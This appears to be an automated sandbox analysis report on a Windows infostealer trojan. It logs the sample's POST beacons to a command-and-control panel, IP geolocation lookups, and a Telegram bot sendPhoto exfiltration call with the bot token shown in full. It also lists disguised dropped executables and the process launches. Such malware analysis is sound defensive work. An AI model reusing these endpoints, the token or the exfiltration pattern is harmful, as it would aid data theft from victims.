Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: 250345cm.renyash.ru

Source: unknown

HTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="df078fe5-ba23-4170-8bea-85b5048774e2"Host: api.telegram.orgContent-Length: 86411Expect: 100-continueConnection: Keep-Alive

Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://250345cm.reP
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002903000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://250345cm.renyash.ru
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://250345cm.renyash.ru/
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000027A8000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000286E000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002903000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://250345cm.renyash.ru/sqltemp.php
Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: fontdrvhost.exe, 0000001A.00000002.2897795682.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: fontdrvhost.exe, 00000004.00000002.1755507962.0000000003825000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.dr	String found in binary or memory: https://api.telegram.org/bot
Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX
Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fontdrvhost.exe, 00000004.00000002.1755507962.000000000380B000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755507962.0000000003849000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: fontdrvhost.exe, 00000004.00000002.1755507962.0000000003805000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.dr	String found in binary or memory: https://ipinfo.io/country
Source: fontdrvhost.exe, 00000004.00000002.1755507962.0000000003805000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.dr	String found in binary or memory: https://ipinfo.io/ip
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://support.mozilla.org
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: doH1J2y0cr.26.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: doH1J2y0cr.26.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://www.mozilla.org
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: dhpSrMBRff.26.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Source: C:\Drivers\fontdrvhost.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00FA6FAA

Source: C:\Drivers\fontdrvhost.exe	File created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe			Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Windows\Downloaded Program Files\f8dafbcfe7f5f1			Jump to behavior

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FA848E	0_2_00FA848E
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FA40FE	0_2_00FA40FE
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB00B7	0_2_00FB00B7
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB4088	0_2_00FB4088
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FC51C9	0_2_00FC51C9
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB7153	0_2_00FB7153
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FA32F7	0_2_00FA32F7
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB62CA	0_2_00FB62CA
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB43BF	0_2_00FB43BF
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FAF461	0_2_00FAF461
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FCD440	0_2_00FCD440
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FAC426	0_2_00FAC426
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB77EF	0_2_00FB77EF
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FCD8EE	0_2_00FCD8EE
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FA286B	0_2_00FA286B
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FD19F4	0_2_00FD19F4
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FAE9B7	0_2_00FAE9B7
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB6CDC	0_2_00FB6CDC
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FB3E0B	0_2_00FB3E0B
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FAEFE2	0_2_00FAEFE2
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FC4F9A	0_2_00FC4F9A
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9B880D48	4_2_00007FFD9B880D48
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9B880E43	4_2_00007FFD9B880E43
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9BC7946A	4_2_00007FFD9BC7946A
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B8B0B55	23_2_00007FFD9B8B0B55
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B880D48	23_2_00007FFD9B880D48
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B880E43	23_2_00007FFD9B880E43
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 24_2_00007FFD9B8B0D48	24_2_00007FFD9B8B0D48
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 24_2_00007FFD9B8B0E43	24_2_00007FFD9B8B0E43
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8C0B55	25_2_00007FFD9B8C0B55
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8CCA0F	25_2_00007FFD9B8CCA0F
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8A0947	25_2_00007FFD9B8A0947
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B890D48	25_2_00007FFD9B890D48
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B890E43	25_2_00007FFD9B890E43
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B8A0D48	26_2_00007FFD9B8A0D48
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B8A0E43	26_2_00007FFD9B8A0E43
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B96318C	26_2_00007FFD9B96318C
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9BC9944F	26_2_00007FFD9BC9944F
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9BDC3DA9	26_2_00007FFD9BDC3DA9
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9BDC9185	26_2_00007FFD9BDC9185
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9BDC4C8A	26_2_00007FFD9BDC4C8A
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 35_2_00007FFD9B880D48	35_2_00007FFD9B880D48
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 35_2_00007FFD9B880E43	35_2_00007FFD9B880E43
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 35_2_00007FFD9B8B0B55	35_2_00007FFD9B8B0B55

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BimGJlFQ.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: String function: 00FBEB78 appears 39 times
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: String function: 00FBF5F0 appears 31 times
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: String function: 00FBEC50 appears 56 times

Source: YGk3y6Tdix.exe, 00000000.00000003.1648168800.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs YGk3y6Tdix.exe
Source: YGk3y6Tdix.exe, 00000000.00000003.1648076766.0000000000C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs YGk3y6Tdix.exe
Source: YGk3y6Tdix.exe, 00000000.00000003.1647906191.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs YGk3y6Tdix.exe
Source: YGk3y6Tdix.exe, 00000000.00000002.1649526523.0000000000C53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs YGk3y6Tdix.exe
Source: YGk3y6Tdix.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs YGk3y6Tdix.exe

Source: YGk3y6Tdix.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: fontdrvhost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe0.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe1.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe2.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@40/50@4/3

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FA6C74 GetLastError,FormatMessageW,

0_2_00FA6C74

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00FBA6C2

Source: C:\Drivers\fontdrvhost.exe

File created: C:\Program Files\Internet Explorer\SIGNUP\services.exe

Jump to behavior

Source: C:\Drivers\fontdrvhost.exe

File created: C:\Users\user\Desktop\jqKBOCJa.log

Jump to behavior

Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Mutant created: NULL
Source: C:\Drivers\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\fontdrvhost
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03

Source: C:\Drivers\fontdrvhost.exe

File created: C:\Users\user\AppData\Local\Temp\t6yFe3K859

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Command line argument: sfxname	0_2_00FBDF1E
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Command line argument: sfxstime	0_2_00FBDF1E
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Command line argument: STARTDLG	0_2_00FBDF1E

Source: YGk3y6Tdix.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: YGk3y6Tdix.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
